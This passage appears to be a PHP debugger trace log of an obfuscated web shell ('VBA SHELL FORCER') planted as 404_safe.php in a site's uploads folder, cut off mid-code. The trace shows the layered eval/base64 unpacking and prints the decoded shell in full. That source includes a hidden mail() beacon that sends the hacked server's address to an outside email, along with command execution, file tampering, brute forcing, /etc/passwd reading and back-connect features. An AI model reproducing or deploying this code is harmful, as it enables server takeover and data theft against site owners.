			$timearray['hours']   = 0;
			$timearray['minutes'] = 0;
			$timearray['seconds'] = 0;
		} // end if
		return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
				($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
	}

	function addFile($data, $name, $time = 0) {
		$name = str_replace('\\', '/', $name);

		$dtime = dechex($this->unix2DosTime($time));
		$hexdtime	= '\x' . $dtime[6] . $dtime[7]
					. '\x' . $dtime[4] . $dtime[5]
					. '\x' . $dtime[2] . $dtime[3]
					. '\x' . $dtime[0] . $dtime[1];
		eval('$hexdtime = "' . $hexdtime . '";');
		$fr	= "\x50\x4b\x03\x04";
		$fr	.= "\x14\x00";
		$fr	.= "\x00\x00";
		$fr	.= "\x08\x00";
		$fr	.= $hexdtime;

		$unc_len = strlen($data);
		$crc = crc32($data);
		$zdata = gzcompress($data);
		$c_len = strlen($zdata);
		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
		$fr .= pack('V', $crc);
		$fr .= pack('V', $c_len);
		$fr .= pack('V', $unc_len);
		$fr .= pack('v', strlen($name));
		$fr .= pack('v', 0);
		$fr .= $name;
		$fr .= $zdata;
		$fr .= pack('V', $crc);
		$fr .= pack('V', $c_len);
		$fr .= pack('V', $unc_len);

		$this -> datasec[] = $fr;
		$new_offset = strlen(implode('', $this->datasec));

		$cdrec = "\x50\x4b\x01\x02";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x14\x00";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x08\x00";
		$cdrec .= $hexdtime;
		$cdrec .= pack('V', $crc);
		$cdrec .= pack('V', $c_len);
		$cdrec .= pack('V', $unc_len);
		$cdrec .= pack('v', strlen($name) );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('v', 0 );
		$cdrec .= pack('V', 32 );
		$cdrec .= pack('V', $this -> old_offset );
		$this -> old_offset = $new_offset;
		$cdrec .= $name;

		$this -> ctrl_dir[] = $cdrec;
	}

	function file() {
		$data    = implode('', $this -> datasec);
		$ctrldir = implode('', $this -> ctrl_dir);
		return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) .	pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
	}
}

// Dump mysql
function sqldumptable($table, $fp=0) {
	$tabledump = "DROP TABLE IF EXISTS $table;\n";
	$tabledump .= "CREATE TABLE $table (\n";

	$firstfield=1;

	$fields = q("SHOW FIELDS FROM $table");
	while ($field = mysql_fetch_array($fields)) {
		if (!$firstfield) {
			$tabledump .= ",\n";
		} else {
			$firstfield=0;
		}
		$tabledump .= "   $field[Field] $field[Type]";
		if (!empty($field["Default"])) {
			$tabledump .= " DEFAULT '$field[Default]'";
		}
		if ($field['Null'] != "YES") {
			$tabledump .= " NOT NULL";
		}
		if ($field['Extra'] != "") {
			$tabledump .= " $field[Extra]";
		}
	}
	fr($fields);

	$keys = q("SHOW KEYS FROM $table");
	while ($key = mysql_fetch_array($keys)) {
		$kname=$key['Key_name'];
		if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
			$kname="UNIQUE|$kname";
		}
		if(!is_array($index[$kname])) {
			$index[$kname] = array();
		}
		$index[$kname][] = $key['Column_name'];
	}
	fr($keys);

	while(list($kname, $columns) = @each($index)) {
		$tabledump .= ",\n";
		$colnames=implode($columns,",");

		if ($kname == "PRIMARY") {
			$tabledump .= "   PRIMARY KEY ($colnames)";
		} else {
			if (substr($kname,0,6) == "UNIQUE") {
				$kname=substr($kname,7);
			}
			$tabledump .= "   KEY $kname ($colnames)";
		}
	}

	$tabledump .= "\n);\n\n";
	if ($fp) {
		fwrite($fp,$tabledump);
	} else {
		echo $tabledump;
	}

	$rows = q("SELECT * FROM $table");
	$numfields = mysql_num_fields($rows);
	while ($row = mysql_fetch_array($rows)) {
		$tabledump = "INSERT INTO $table VALUES(";

		$fieldcounter=-1;
		$firstfield=1;
		while (++$fieldcounter<$numfields) {
			if (!$firstfield) {
				$tabledump.=", ";
			} else {
				$firstfield=0;
			}

			if (!isset($row[$fieldcounter])) {
				$tabledump .= "NULL";
			} else {
				$tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
			}
		}

		$tabledump .= ");\n";

		if ($fp) {
			fwrite($fp,$tabledump);
		} else {
			echo $tabledump;
		}
	}
	fr($rows);
	if ($fp) {
		fwrite($fp,"\n");
	} else {
		echo "\n";
	}
}

function ue($str){
	return urlencode($str);
}

function p($str){
	echo $str."\n";
}

function tbhead() {
	p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
}
function tbfoot(){
	p('</table>');
}

function makehide($name,$value=''){
	p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
}

function makeinput($arg = array()){
	$arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
	$arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
	!$arg['type'] && $arg['type'] = 'text';
	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
	$arg['class'] = $arg['class'] ? $arg['class'] : 'input';
	if ($arg['newline']) {
		p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
	} else {
		p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
	}
}

function makeselect($arg = array()){
	if ($arg['onchange']) {
		$onchange = 'onchange="'.$arg['onchange'].'"';
	}
	$arg['title'] = $arg['title'] ? $arg['title'] : '';
	if ($arg['newline']) p('<p>');
	p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
		if (is_array($arg['option'])) {
			foreach ($arg['option'] as $key=>$value) {
				if ($arg['selected']==$key) {
					p("<option value=\"$key\" selected>$value</option>");
				} else {
					p("<option value=\"$key\">$value</option>");
				}
			}
		}
	p("</select>");
	if ($arg['newline']) p('</p>');
}
function formhead($arg = array()) {
	!$arg['method'] && $arg['method'] = 'post';
	!$arg['action'] && $arg['action'] = $self;
	$arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
	!$arg['name'] && $arg['name'] = 'form1';
	p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
	if ($arg['title']) {
		p('<h2>'.$arg['title'].' &raquo;</h2>');
	}
}

function maketext($arg = array()){
	!$arg['cols'] && $arg['cols'] = 100;
	!$arg['rows'] && $arg['rows'] = 25;
	$arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
	p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
}

function formfooter($name = ''){
	!$name && $name = 'submit';
	p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
	p('</form>');
}

function formfoot(){
	p('</form>');
}

// Exit
function pr($a) {
	echo '<pre>';
	print_r($a);
	echo '</pre>';
}\';$b=strrev("46esab").str_replace(\'f\',\'\',\'_fdefcodfe\');eval($b($a));'	/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code	1	0
4		A						/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	$a = 'LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKipcCnwqICAgIFZCQSBTSEVMTCBGT1JDRVIgLSBWRVJTSU9OIDIuMQkqfAp8KiAgICAgRWRpdCAmIERldmVsb3AgYnkgVkJBVEVBTSAgICAgICAgKnwKfCogIAkgIGh0dHA6Ly92YmF0ZWFtLm5ldCAgICAJICAgICp8CnwqICAgID09ICBIYWNraW5nICYgU2VjdXJpdHkgID09ICAgICAgICAqfApcKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8KCmVycm9yX3JlcG9ydGluZyg3KTsKQHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTsKb2Jfc3RhcnQoKTsKJG10aW1lID0gZXhwbG9kZSgnICcsIG1pY3JvdGltZSgpKTsKJHN0YXJ0dGltZSA9ICRtdGltZVsxXSArICRtdGltZVswXTsK'
5	19	0	0.005640	892728	strrev	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'46esab'
5	19	1	0.005657	892792
5	19	R			'base64'
5	20	0	0.005672	892760	str_replace	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	3	'f'	''	'_fdefcodfe'
5	20	1	0.005688	892888
5	20	R			'_decode'
4		A						/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	$b = 'base64_decode'
5	21	0	0.005718	892768	base64_decode	0		/var/www/html/uploads/404_safe.php(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code	1	1	'LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKipcCnwqICAgIFZCQSBTSEVMTCBGT1JDRVIgLSBWRVJTSU9OIDIuMQkqfAp8KiAgICAgRWRpdCAmIERldmVsb3AgYnkgVkJBVEVBTSAgICAgICAgKnwKfCogIAkgIGh0dHA6Ly92YmF0ZWFtLm5ldCAgICAJICAgICp8CnwqICAgID09ICBIYWNraW5nICYgU2VjdXJpdHkgID09ICAgICAgICAqfApcKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8KCmVycm9yX3JlcG9ydGluZyg3KTsKQHNldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTsKb2Jfc3RhcnQoKTsKJG10aW1lID0gZXhwbG9kZSgnICcsIG1pY3JvdGltZSgpKTsKJHN0YXJ0dGltZSA9ICRtdGltZVsxXSArICRtdGltZVswXTsK'
5	21	1	0.006044	995200
5	21	R			'/****************************************\\\n|*    VBA SHELL FORCER - VERSION 2.1\t*|\n|*     Edit & Develop by VBATEAM        *|\n|*  \t  http://vbateam.net    \t    *|\n|*    ==  Hacking & Security  ==        *|\n\\****************************************/\n\nerror_reporting(7);\n@set_magic_quotes_runtime(0);\nob_start();\n$mtime = explode(\' \', microtime());\n$starttime = $mtime[1] + $mtime[0];\ndefine(\'SA_ROOT\', str_replace(\'\\\\\', \'/\', dirname(__FILE__)).\'/\');\n//define(\'IS_WIN\', strstr(PHP_'
5	22	0	0.009032	1548296	eval	1	'/****************************************\\\n|*    VBA SHELL FORCER - VERSION 2.1\t*|\n|*     Edit & Develop by VBATEAM        *|\n|*  \t  http://vbateam.net    \t    *|\n|*    ==  Hacking & Security  ==        *|\n\\****************************************/\n\nerror_reporting(7);\n@set_magic_quotes_runtime(0);\nob_start();\n$mtime = explode(\' \', microtime());\n$starttime = $mtime[1] + $mtime[0];\ndefine(\'SA_ROOT\', str_replace(\'\\\\\', \'/\', dirname(__FILE__)).\'/\');\n//define(\'IS_WIN\', strstr(PHP_OS, \'WIN\') ? 1 : 0 );\ndefine(\'IS_WIN\', DIRECTORY_SEPARATOR == \'\\\\\');\ndefine(\'IS_COM\', class_exists(\'COM\') ? 1 : 0 );\ndefine(\'IS_GPC\', get_magic_quotes_gpc());\n$dis_func = get_cfg_var(\'disable_functions\');\ndefine(\'IS_PHPINFO\', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );\n@set_time_limit(0);\n\nforeach(array(\'_GET\',\'_POST\') as $_request) {\n\tforeach($$_request as $_key => $_value) {\n\t\tif ($_key{0} != \'_\') {\n\t\t\tif (IS_GPC) {\n\t\t\t\t$_value = s_array($_value);\n\t\t\t}\n\t\t\t$$_key = $_value;\n\t\t}\n\t}\n}\n\n/*=================  Info Login  ================*/\n$admin = array();\n$admin[\'check\'] = true;\n$admin[\'pass\']  = \'1002912b251887b4fe0e5fa1efdbfa06\'; // Password login\n$admin[\'cookiepre\'] = \'\';\n$admin[\'cookiedomain\'] = \'\';\n$admin[\'cookiepath\'] = \'/\';\n$admin[\'cookielife\'] = 86400;\n/*===================== End =====================*/\n\nif ($charset == \'utf8\') {\n\theader("content-Type: text/html; charset=utf-8");\n} elseif ($charset == \'big5\') {\n\theader("content-Type: text/html; charset=big5");\n} elseif ($charset == \'gbk\') {\n\theader("content-Type: text/html; charset=gbk");\n} elseif ($charset == \'latin1\') {\n\theader("content-Type: text/html; charset=iso-8859-2");\n}\n\n$self = $_SERVER[\'PHP_SELF\'] ? $_SERVER[\'PHP_SELF\'] : $_SERVER[\'SCRIPT_NAME\'];\n$timestamp = time();\n\n/*===================== Login =====================*/\nif ($action == "logout") {\n\tscookie(\'vbapass\', \'\', -86400 * 365);\n\tp(\'<meta http-equiv="refresh" content="0;URL=\'.$self.\'">\');\n\tp(\'<body background=black>\');\n\texit;\n}\nif($admin[\'check\']) {\n\tif ($doing == \'login\') {\n\t\tif ($admin[\'pass\'] == md5($password)) {\n\t\t\tscookie(\'vbapass\', md5($password));\n\n// Function mail Sender to my Email - Please remove this before you using this shell code, Thanks - Fernando - VBATeam\n$time_shell = "".date("d/m/Y - H:i:s")."";\n$ip_remote = $_SERVER["REMOTE_ADDR"];\n$from_shellcode = \'shell@\'.gethostbyname($_SERVER[\'SERVER_NAME\']).\'\';\n$to_email = \'xedorac@gmail.com\';\n$server_mail = "".gethostbyname($_SERVER[\'SERVER_NAME\'])."  - ".$_SERVER[\'HTTP_HOST\']."";\n$linkcr = "Link: ".$_SERVER[\'SERVER_NAME\']."".$_SERVER[\'REQUEST_URI\']." - IP Excuting: $ip_remote - Time: $time_shell";\n$header = "From: $from_shellcode\\r\\nReply-to: $from_shellcode";\n@mail($to_email, $server_mail, $linkcr, $header);\n\t\t\tp(\'<meta http-equiv="refresh" content="2;URL=\'.$self.\'">\');\n\t\t\tp(\'<body bgcolor=black>\n<BR><BR><div align=center><font color=yellow face=tahoma size=2>Connecting...<BR><img src=http://t3.gstatic.com/images?q=tbn:ANd9GcRFIQy9oLc9jMWmDY_N_sxjWPyusUWC4igwK2lqBm68aDGcSfKPPA></div>\');\n\t\t\texit;\n\t\t}\n\n\telse\n\t{\n\t$err_mess = \'<table width=100%><tr><td bgcolor=#F0F0F0 width=100% height=24><div align=center><font color=red face=tahoma size=2><blink>Password incorrect, Please try again!!!</blink><BR></font></div></td></tr></table>\';\necho $err_mess;\n\t}}\n\tif ($_COOKIE[\'vbapass\']) {\n\t\tif ($_COOKIE[\'vbapass\'] != $admin[\'pass\']) {\n\t\t\tloginpage();\n\t\t}\n\t} else {\n\t\tloginpage();\n\t}\n}\n/*===================== Login =====================*/\n\n$errmsg = \'\';\n\nif ($action == \'phpinfo\') {\n\tif (IS_PHPINFO) {\n\t\tphpinfo();\n\t} else {\n\t\t$errmsg = \'phpinfo() function has non-permissible\';\n\t}\n}\n\n\nif ($doing == \'downfile\' && $thefile) {\n\tif (!@file_exists($thefile)) {\n\t\t$errmsg = \'The file you want Downloadable was nonexistent\';\n\t} else {\n\t\t$fileinfo = pathinfo($thefile);\n\t\theader(\'Content-type: application/x-\'.$fileinfo[\'extension\']);\n\t\theader(\'Content-Disposition: attachment; filename=\'.$fileinfo[\'basename\']);\n\t\theader(\'Content-Length: \'.filesize($thefile));\n\t\t@readfile($thefile);\n\t\texit;\n\t}\n}\n\n\nif ($doing == \'backupmysql\' && !$saveasfile) {\n\tdbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);\n\t$table = array_flip($table);\n\t$result = q("SHOW tables");\n\tif (!$result) p(\'<h2>\'.mysql_error().\'</h2>\');\n\t$filename = basename($_SERVER[\'HTTP_HOST\'].\'_MySQL.sql\');\n\theader(\'Content-type: application/unknown\');\n\theader(\'Content-Disposition: attachment; filename=\'.$filename);\n\t$mysqldata = \'\';\n\twhile ($currow = mysql_fetch_array($result)) {\n\t\tif (isset($table[$currow[0]])) {\n\t\t\t$mysqldata .= sqldumptable($currow[0]);\n\t\t}\n\t}\n\tmysql_close();\n\texit;\n}\n\n// Mysql\nif($doing==\'mysqldown\'){\n\tif (!$dbname) {\n\t\t$errmsg = \'Please input dbname\';\n\t} else {\n\t\tdbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);\n\t\tif (!file_exists($mysqldlfile)) {\n\t\t\t$errmsg = \'The file you want Downloadable was nonexistent\';\n\t\t} else {\n\t\t\t$result = q("select load_file(\'$mysqldlfile\');");\n\t\t\tif(!$result){\n\t\t\t\tq("DROP TABLE IF EXISTS tmp_angel;");\n\t\t\t\tq("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");\n\t\t\t\t//Download SQL\n\t\t\t\tq("LOAD DATA LOCAL INFILE \'".addslashes($mysqldlfile)."\' INTO TABLE tmp_angel FIELDS TERMINATED BY \'__angel_{$timestamp}_eof__\' ESCAPED BY \'\' LINES TERMINATED BY \'__angel_{$timestamp}_eof__\';");\n\t\t\t\t$result = q("select content from tmp_angel");\n\t\t\t\tq("DROP TABLE tmp_angel");\n\t\t\t}\n\t\t\t$row = @mysql_fetch_array($result);\n\t\t\tif (!$row) {\n\t\t\t\t$errmsg = \'Load file failed \'.mysql_error();\n\t\t\t} else {\n\t\t\t\t$fileinfo = pathinfo($mysqldlfile);\n\t\t\t\theader(\'Content-type: application/x-\'.$fileinfo[\'extension\']);\n\t\t\t\theader(\'Content-Disposition: attachment; filename=\'.$fileinfo[\'basename\']);\n\t\t\t\theader("Accept-Length: ".strlen($row[0]));\n\t\t\t\techo $row[0];\n\t\t\t\texit;\n\t\t\t}\n\t\t}\n\t}\n}\n\n?>\n\n<html>\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8">\n<title><?php echo str_replace(\'.\',\'\',\'The Legend of Vietnamese Hacker World\');?></title>\n<style type="text/css">\nbody,td{font: 10pt Tahoma;color:gray;line-height: 16px;}\n\na {color: #74A202;text-decoration:none;}\na:hover{color: #f00;text-decoration:underline;}\n.alt1 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}\n.alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}\n.focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}\n.fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}\n.fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#202020;padding:5px 10px 5px 5px;}\n.head td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:bold;}\n.head_small td{border-top:1px solid gray;border-bottom:1px solid gray;background:#202020;padding:5px 10px 5px 5px;font-weight:normal;font-size:8pt;}\n.head td span{font-weight:normal;}\nform{margin:0;padding:0;}\nh2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}\nul.info li{margin:0;color:#444;line-height:24px;height:24px;}\nu{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}\ninput, textarea, button\n{\n\tfont-size: 9pt;\n\tcolor: #ccc;\n\tfont-family: verdana, sans-serif;\n\tbackground-color: #202020;\n\tborder-left: 1px solid #74A202;\n\tborder-top: 1px solid #74A202;\n\tborder-right: 1px solid #74A202;\n\tborder-bottom: 1px solid #74A202;\n}\nselect\n{\n\tfont-size: 8pt;\n\tfont-weight: normal;\n\tcolor: #ccc;\n\tfont-family: verdana, sans-serif;\n\tbackground-color: #202020;\n}\n\n</style>\n<script type="text/javascript">\nfunction CheckAll(form) {\n\tfor(var i=0;i<form.elements.length;i++) {\n\t\tvar e = form.elements[i];\n\t\tif (e.name != \'chkall\')\n\t\te.checked = form.chkall.checked;\n    }\n}\nfunction $(id) {\n\treturn document.getElementById(id);\n}\nfunction goaction(act){\n\t$(\'goaction\').action.value=act;\n\t$(\'goaction\').submit();\n}\n</script>\n</head>\n<body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black background=http://i382.photobucket.com/albums/oo263/vnhacker/bg-1.jpg>\n\n\n<div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">\n\t\t\t\t<table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">\n\t\t\t\t\t<tr>\n\t\t\t\t\t\t<td align="center" valign=center>\n\t\t\t\t <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600"  align="center">\n\t\t\t\t   Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">\n\t\t\t\t  </div>\n\t\t\t\t</td>\n\t\t\t\t\t</tr>\n\t\t\t\t</table>\n\t\t\t </div>\n <script>\n var ld=(document.all);\n  var ns4=document.layers;\n var ns6=document.getElementById&&!document.all;\n var ie4=document.all;\n  if (ns4)\n \tld=document.loading;\n else if (ns6)\n \tld=document.getElementById("loading").style;\n else if (ie4)\n \tld=document.all.loading.style;\n  function init()\n {\n if(ns4){ld.visibility="hidden";}\n else if (ns6||ie4) ld.display="none";\n }\n </script>\n<table width="100%" border="0" cellpadding="0" cellspacing="0">\n\t<tr class="head_small">\n\t\t<td  width=100%>\n\t\t<table width=100%><tr class="head_small"><td>\n\t\t<span style="float:left;"> <?php echo "Hostname: ".$_SERVER[\'HTTP_HOST\']."";?> | <span>[ Server IP: <?php echo "<font color=yellow>".gethostbyname($_SERVER[\'SERVER_NAME\'])."</font>";?> - Your IP: <?php echo "<font color=yellow>".$_SERVER[\'REMOTE_ADDR\']."</font>";?> ] </span> | <a href="javascript:goaction(\'logout\');"><font color=red> Logout</font></a></span> <br />\n\n\t\t<?php\n\t\t$curl_on = @function_exists(\'curl_version\');\n\t\t$mysql_on = @function_exists(\'mysql_connect\');\n\t\t$mssql_on = @function_exists(\'mssql_connect\');\n\t\t$pg_on = @function_exists(\'pg_connect\');\n\t\t$ora_on = @function_exists(\'ocilogon\');\n\necho (($safe_mode)?("Safe_mod: <b><font color=green>ON</font></b> - "):("Safe_mod: <b><font color=red>OFF</font></b> - "));\necho "PHP version: <b>".@phpversion()."</b> - ";\n\t\techo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b> - "):("<b><font color=red>OFF</font></b> - "));\n\t\techo "MySQL: <b>";\n$mysql_on = @function_exists(\'mysql_connect\');\nif($mysql_on){\necho "<font color=green>ON</font></b> - "; } else { echo "<font color=red>OFF</font></b> - "; }\necho "MSSQL: <b>";\n$mssql_on = @function_exists(\'mssql_connect\');\nif($mssql_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}\necho "PostgreSQL: <b>";\n$pg_on = @function_exists(\'pg_connect\');\nif($pg_on){echo "<font color=green>ON</font></b> - ";}else{echo "<font color=red>OFF</font></b> - ";}\necho "Oracle: <b>";\n$ora_on = @function_exists(\'ocilogon\');\nif($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b><BR>";}\n\necho "Disable functions : <b>";\nif(\'\'==($df=@ini_get(\'disable_functions\'))){echo "<font color=green>NONE</font></b><BR>";}else{echo "<font color=red>$df</font></b><BR>";}\n\necho "<font color=white>Uname -a</font>: ".@substr(@php_uname(),0,120)."<br>";\necho "<font color=white>Server</font>: ".@substr($SERVER_SOFTWARE,0,120)." - <font color=white>id</font>: ".@getmyuid()."(".@get_current_user().") - uid=".@getmyuid()." (".@get_current_user().") gid=".@getmygid()."(".@get_current_user().")<br>";\n\t\t?>\n\t\t</td></tr></table></td>\n\t</tr>\n\t<tr class="alt1">\n\t\t<td  width=10%>\n\t\t\t\n\t\t\t<a href="javascript:goaction(\'file\');">File Manager</a> |\n\t\t\t<a href="javascript:goaction(\'sqladmin\');">MySQL Manager</a> |\n\t\t\t<a href="javascript:goaction(\'sqlfile\');">MySQL Upload &amp; Download</a> |\n\t\t\t<a href="javascript:goaction(\'shell\');">Execute Command</a> |\n\t\t\t<a href="javascript:goaction(\'phpenv\');">PHP Variable</a> |\n\t\t\t<a href="javascript:goaction(\'eval\');">Eval PHP Code</a>\n\t\t\t<?php if (!IS_WIN) {?> | <a href="javascript:goaction(\'brute\');">Brute</a> <?php }?>\n\t\t\t<?php if (!IS_WIN) {?> | <a href="javascript:goaction(\'etcpwd\');">/etc/passwd</a> <?php }?>\n\t\t\t<?php if (!IS_WIN) {?> | <a href="javascript:goaction(\'backconnect\');">Back Connect</a><?php }?>\n\t\t</td>\n\t</tr>\n</table>\n<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>\n<?php\n\nformhead(array(\'name\'=>\'goaction\'));\nmakehide(\'action\');\nformfoot();\n\n$errmsg && m($errmsg);\n\n// Dir function\n!$dir && $dir = \'.\';\n$nowpath = getPath(SA_ROOT, $dir);\nif (substr($dir, -1) != \'/\') {\n\t$dir = $dir.\'/\';\n}\n$uedir = ue($dir);\n\nif (!$action || $action == \'file\') {\n\n\t// Non-writeable\n\t$dir_writeable = @is_writable($nowpath) ? \'Writable\' : \'Non-writable\';\n\n\t// Delete dir\n\tif ($doing == \'deldir\' && $thefile) {\n\t\tif (!file_exists($thefile)) {\n\t\t\tm($thefile.\' directory does not exist\');\n\t\t} else {\n\t\t\tm(\'Directory delete \'.(deltree($thefile) ? basename($thefile).\' success\' : \'failed\'));\n\t\t}\n\t}\n\n\t// Create new dir\n\telseif ($newdirname) {\n\t\t$mkdirs = $nowpath.$newdirname;\n\t\tif (file_exists($mkdirs)) {\n\t\t\tm(\'Directory has already existed\');\n\t\t} else {\n\t\t\tm(\'Directory created \'.(@mkdir($mkdirs,0777) ? \'success\' : \'failed\'));\n\t\t\t@chmod($mkdirs,0777);\n\t\t}\n\t}\n\n\t// Upload file\n\telseif ($doupfile) {\n\t\tm(\'File upload \'.(@copy($_FILES[\'uploadfile\'][\'tmp_name\'],$uploaddir.\'/\'.$_FILES[\'uploadfile\'][\'name\']) ? \'success\' : \'failed\'));\n\t}\n\n\t// Edit file\n\telseif ($editfilename && $filecontent) {\n\t\t$fp = @fopen($editfilename,\'w\');\n\t\tm(\'Save file \'.(@fwrite($fp,$filecontent) ? \'success\' : \'failed\'));\n\t\t@fclose($fp);\n\t}\n\n\t// Modify\n\telseif ($pfile && $newperm) {\n\t\tif (!file_exists($pfile)) {\n\t\t\tm(\'The original file does not exist\');\n\t\t} else {\n\t\t\t$newperm = base_convert($newperm,8,10);\n\t\t\tm(\'Modify file attributes \'.(@chmod($pfile,$newperm) ? \'success\' : \'failed\'));\n\t\t}\n\t}\n\n\t// Rename\n\telseif ($oldname && $newfilename) {\n\t\t$nname = $nowpath.$newfilename;\n\t\tif (file_exists($nname) || !file_exists($oldname)) {\n\t\t\tm($nname.\' has already existed or original file does not exist\');\n\t\t} else {\n\t\t\tm(basename($oldname).\' renamed \'.basename($nname).(@rename($oldname,$nname) ? \' success\' : \'failed\'));\n\t\t}\n\t}\n\n\t// Copu\n\telseif ($sname && $tofile) {\n\t\tif (file_exists($tofile) || !file_exists($sname)) {\n\t\t\tm(\'The goal file has already existed or original file does not exist\');\n\t\t} else {\n\t\t\tm(basename($tofile).\' copied \'.(@copy($sname,$tofile) ? basename($tofile).\' success\' : \'failed\'));\n\t\t}\n\t}\n\n\t// File exit\n\telseif ($curfile && $tarfile) {\n\t\tif (!@file_exists($curfile) || !@file_exists($tarfile)) {\n\t\t\tm(\'The goal file has already existed or original file does not exist\');\n\t\t} else {\n\t\t\t$time = @filemtime($tarfile);\n\t\t\tm(\'Modify file the last modified \'.(@touch($curfile,$time,$time) ? \'success\' : \'failed\'));\n\t\t}\n\t}\n\n\t// Date\n\telseif ($curfile && $year && $month && $day && $hour && $minute && $second) {\n\t\tif (!@file_exists($curfile)) {\n\t\t\tm(basename($curfile).\' does not exist\');\n\t\t} else {\n\t\t\t$time = strtotime("$year-$month-$day $hour:$minute:$second");\n\t\t\tm(\'Modify file the last modified \'.(@touch($curfile,$time,$time) ? \'success\' : \'failed\'));\n\t\t}\n\t}\n\n\t// Download\n\telseif($doing == \'downrar\') {\n\t\tif ($dl) {\n\t\t\t$dfiles=\'\';\n\t\t\tforeach ($dl as $filepath => $value) {\n\t\t\t\t$dfiles.=$filepath.\',\';\n\t\t\t}\n\t\t\t$dfiles=substr($dfiles,0,strlen($dfiles)-1);\n\t\t\t$dl=explode(\',\',$dfiles);\n\t\t\t$zip=new PHPZip($dl);\n\t\t\t$code=$zip->out;\n\t\t\theader(\'Content-type: application/octet-stream\');\n\t\t\theader(\'Accept-Ranges: bytes\');\n\t\t\theader(\'Accept-Length: \'.strlen($code));\n\t\t\theader(\'Content-Disposition: attachment;filename=\'.$_SERVER[\'HTTP_HOST\'].\'_Files.tar.gz\');\n\t\t\techo $code;\n\t\t\texit;\n\t\t} else {\n\t\t\tm(\'Please select file(s)\');\n\t\t}\n\t}\n\n\t// Delete file\n\telseif($doing == \'delfiles\') {\n\t\tif ($dl) {\n\t\t\t$dfiles=\'\';\n\t\t\t$succ = $fail = 0;\n\t\t\tforeach ($dl as $filepath => $value) {\n\t\t\t\tif (@unlink($filepath)) {\n\t\t\t\t\t$succ++;\n\t\t\t\t} else {\n\t\t\t\t\t$fail++;\n\t\t\t\t}\n\t\t\t}\n\t\t\tm(\'Deleted file have finished??choose \'.count($dl).\' success \'.$succ.\' fail \'.$fail);\n\t\t} else 